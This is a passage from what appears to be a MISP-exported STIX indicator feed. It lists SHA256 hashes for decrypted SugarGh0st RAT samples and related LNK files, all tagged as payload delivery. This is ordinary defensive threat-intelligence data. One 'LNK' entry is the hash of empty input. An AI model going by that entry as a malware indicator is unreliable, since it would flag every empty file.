RAT", "pattern": "[file:hashes.SHA256 = '53e7e7fce0d8fde3be0d6679193f924555df217b696f6dc201e1966e9f4efabd']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59057bf3-6220-4a96-ac49-458f2cad116d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'ac5342050b0ec85a122846510e06f861960c45613ecc05e3951c57d7d02aa716']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--365ab122-e71d-4f97-a8b6-bd5036e035f7", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '21cf0efec4def4a95af75a7bfdef915bf103a9a6cd03593b4f665f49cdbe4a02']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--453439ce-14e4-48b1-bd22-b62fcfaa47da", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '58754bf9701a39bf13959157db5761d19a562264ac79a8ae47b82589d17a1a07']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7cc6f2dd-8f4b-4915-bde7-3b23e8d9cd6f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '5f40142782f5e13334caf25f3038be324b3f47a3ee465f6da4442ec6e7920d5b']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--04fd3bb3-c9d7-48de-9dc8-ff6f18267231", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '862f6f60d6c145d99fb01476708c93e72f0b905ee54aba03904e92eaf3d8b2d9']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fd1e017e-a36c-4f32-ba13-54c5c999b98b", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '99ab797804684699925b70bdf2ecbbb878f4a86e7b971349036700c72ad15fb1']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fa5acfb5-1e1c-4015-a964-1d68014d3fe9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '653281c876250878eb503e4377c3f79bdfec31e94b27e5413a1b9f8f0f84a6a4']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8b95b4ba-0720-4cdd-86b2-f1c6873ca8f4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'c8bfebff63e5f227aacb3a0aebcf40c973a4fbde6d37895c76498798e925cfb6']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--183b298f-964e-4113-8165-d2e18c3f8ce8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'cac8c35fd03cc8698e53cafa64941be59870380ecedd2f4998e110787224241c']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0eed57e1-b6d0-4ee5-836b-d4e253ca28f3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '18270dd537c3e2f02513b51c3a89814f4c34aa994aa8d823bc534fa39d95dde2']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4561be59-ef13-4b99-9df8-5e0721954a6e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '4509575df3a0a791838f13405122def4eae7f5d2d8142f4830f6944ecd913f03']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--76a0b7e6-fe95-47ac-99e0-d0feeb8f1e04", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '823d23f1bcc76b08773e988be209b4a2f1cf99b094732cde395bc40f0729948e']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9f06f98b-9e9d-4da8-9d03-5c87e332919f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '70359e4ce398ad356fd36f1f9306a570b36c552b83310332e5bf257f21cb1e9a']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--eef5e602-f8af-478b-b078-2c43d71cf09f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'e2a8ffe20d91720516b242d0053ae58474be4205b9926993eab13e6662cb9a91']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--294b1a5e-80ab-4aa0-adff-84f7ccff7d42", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '267eec9cd5ff136364e0346d62df0cbb0294e0fb8f672685e785bf3ffddfb76e']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--004d5974-3799-4235-8d6a-2e18e7b3af66", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '7ccb9b8964391360d6e122343d714301851c2332f0d50e037fe08591bd7c139d']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--337a442e-4495-4067-ae2e-9d92564018c8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '7caca38b67f9f629912f21bc0d76f8a5782fc62cccb93f53d2d07fd21fd30c33']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--22f5e4ca-294c-483d-9a64-8c40f8a44865", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '66f2712d989950e3b6c1f56a08b2e8689ea8a48bf84c7cee93583c7e78591f3c']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--50a1b683-26e1-46e2-b28e-9dc26cefd8e9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'b9a60ea9b1ac73e333b403f8471b5111a0ba67b60c9f0d7e44e2e290fccf6f42']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--97bcc14e-c7ea-4ecb-a6a3-507cac3e0a89", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '837164909df9b37bc31edcdb1207954337bad59a630b44f8ea06a594bcbe4035']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9de1c1fe-4740-4aa3-95eb-56e2a7d44bb8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '4cdc33e535d07e6519b1be0520349dedaefcc464734b24d1e656414100680efe']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--15a2c00a-b852-4b96-9b0b-5ad4e196492e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fa17ca90-0d67-4384-ab75-98255c2e71c3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'd31b5dd937655c14caff1cca6da88dc81f9cc523e119d43a9ac38dbb302eebbd']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--58e0435b-6cd5-4a2d-b5c1-e1c03300c2d0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '21123d5bf92e763c4ef34fd4f9ddcb1b3a4a2c9ab0fd5657f4f30b0964979274']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3ac7bf41-0877-4a13-b7e3-ec834f73a576", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '75b39e923c69b488ae6981d314075f7e423ba2236150c20d41112db8f80a4827']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b9a2c24f-185e-4505-90d2-230cb0b052ee", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '6071f84650b3226f60068f5f7a1dc7c7ec819ab7b6e8dcf341638b966fda44b0']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9802b013-445d-477a-adc3-e5072561fc7f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '510acd67d4c5fb45d6721283ed0eb4128347458ccb2b00feda9787f138c35278']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--14457179-5310-404c-82e4-13451899f4bf", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4f98dc3df220f41bce3c3a2714392279e68dd24a53c7c2f22a0a9850eb5d8476']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--51677e36-30e1-4c18-9e35-110716d52dac", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2e2aef8948f5e2d93df7f4412fadc31500feb9035ceff18cce85393c6e230088']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--dcdd5dc9-f60d-4b1a-b755-284eae3033ab", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'c0230704e1ee34666c40b2a3898666ba3929283ad0a86b63ab0fad6f4a0555ec']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3bc0c79d-41e1-4000-807d-d05290e5344c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f7de8e94f280f9b943950a75ae78032c6501261a12650a6f757107bc8df6c3c2']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3e01d0e1-f8d8-479f-9d5f-2a57121b5b81", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'bc73528b391f30acdd3c3a1674bc7973d3026c367142d72684facd68915851f6']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--68897ecf-1e90-428c-bc3d-d1434e66b7b9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'e11908adf04627812cfa721189dfa06f884ceedff2dfa3b18578494995561716']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--469403e9-ea50-4db3-8f22-da6747dc46d4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '0fcc045db0d07ea4909a487273d313f796fa19ee8095a5272dfc5d6f3484f4ec']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--555e14b3-2549-492f-9244-a94a4f1b12ac", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'bdcc0bc3f5d022f99a1599c7cbed3aa2b6839e1e1d05ed2448dbd8b7ab34c784']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--26c5b8d0-7437-40ce-ac7c-8da55c3ddbec", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '065f10e2a92b433a779c508e4add9c096b2891f5417fa183e58c8b8f7f9f8524']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c9727765-903d-4955-ac71-1e2d4d54de5c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '87bda94d6b5ad0170c07abe540f530e797c6fec7410b30796e265cc21997d735']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e89c5bed-5701-4689-a0b8-50bd69c27994", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '401720fa24dc03cce8640b00d00c57676a8369ee49f456bd771a6ecbd81b82b6']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e46033b3-57ad-4c0f-a867-d602de55d019", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '84572497f7022163bbb2e9885c942b1bcfa1793305c116ac898ee1b52ab6f898']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8d021809-dc2d-4509-9e2c-493365ea1afc", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2f32e99c182f0f7cf6ff54d9d1a9d9f7e59823030d2a89e15890c2c8b1612caf']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d5219c09-b2f1-4c23-8b1d-718ef6eccdd9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '57e3c92639027738e5a867d2f66d30a9509a96573d7a5eeee1c2a710faf9321c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--93717411-b875-4675-8221-1ad4065ade3a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '7528cf4daa8f0b4108ff220bc98f6046faf446653a3f98edc1d58350490d9fc8']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--99df17c8-febb-4b49-8ab2-da8e51bccb83", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'b89ebfdfa9abb0ab618ebf2baf66b6cf27929d1e6599b3cb174c12e0a4c71d96']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a2abe63e-640d-4741-95a3-63ffe8ae170c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '6f8ccda88e0ff98c781ad6e027f4294eb54bff27a3ca1cd72aa83e4082013860']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c3f7aa63-d41c-4763-84c4-d8327fb80ad4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '162594cdb38526300af0db4acd13dd7a5a4ac07004bf32f887b6f149236160b7']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--52e26066-3aa6-477b-8bb9-48ebf9d10d84", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f46b2a57ee2904ded87f6db77ed4373bfd71de12879bd939348ccb8fa8cc1403']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5d423281-c758-4dc8-bd1d-a59b6bde3b63", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 